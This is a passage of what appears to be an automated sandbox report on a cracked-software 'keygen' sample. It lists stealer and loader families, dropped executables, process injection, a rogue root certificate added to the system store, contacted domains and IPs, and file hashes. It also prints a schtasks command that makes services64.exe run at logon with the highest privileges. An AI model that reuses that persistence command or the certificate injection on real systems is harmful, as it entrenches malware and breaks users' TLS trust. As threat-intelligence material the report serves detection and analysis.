| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3060 wrote to memory of 3404 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 3060 wrote to memory of 3404 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 3060 wrote to memory of 3404 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3060-0-0x0000000000400000-0x00000000004E5000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20240903-en
Max time kernel
85s
Max time network
146s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 136
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| RU | 186.2.171.3:443 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| SG | 37.0.10.244:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp |
Files
\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/2804-45-0x0000000000220000-0x00000000003F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/2992-70-0x00000000008F0000-0x0000000000910000-memory.dmp
memory/2152-69-0x0000000000D20000-0x0000000000D28000-memory.dmp
memory/2504-68-0x000000013FF70000-0x000000013FF80000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/2992-84-0x0000000000450000-0x000000000046A000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/800-98-0x0000000003850000-0x0000000003AB7000-memory.dmp
memory/800-97-0x0000000003850000-0x0000000003AB7000-memory.dmp
memory/3008-100-0x0000000000400000-0x0000000000667000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab58EB.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/3008-120-0x0000000000400000-0x0000000000667000-memory.dmp
memory/528-119-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/2504-125-0x0000000000A70000-0x0000000000A7E000-memory.dmp
memory/2056-132-0x000000013F320000-0x000000013F330000-memory.dmp
memory/3008-133-0x0000000000400000-0x0000000000667000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/2408-166-0x00000000008A0000-0x00000000008BE000-memory.dmp
memory/2408-167-0x0000000000240000-0x000000000025A000-memory.dmp
memory/2032-152-0x0000000000400000-0x0000000002B4E000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1480-191-0x000000013F8C0000-0x000000013F8C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar5ACE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aa1ae69f33f753697474e8076e7477cb |
| SHA1 | 355bda4e65533627397e5dc3ae1a95260c2eb0be |
| SHA256 | e7117af0feb90088913065fd4173a4424bae3faca9ab339094660192f14f46d7 |
| SHA512 | ceafdd223859eabe215f2d773ac0305265151a66d267514476d7cef07b6e0002e48c76360e40bb2339648bc2cb263fa24aa2e70bbaa87ba62dbeff7841049fbb |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20240903-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2756 wrote to memory of 2588 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2756 wrote to memory of 2588 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2756 wrote to memory of 2588 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2756 wrote to memory of 2588 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
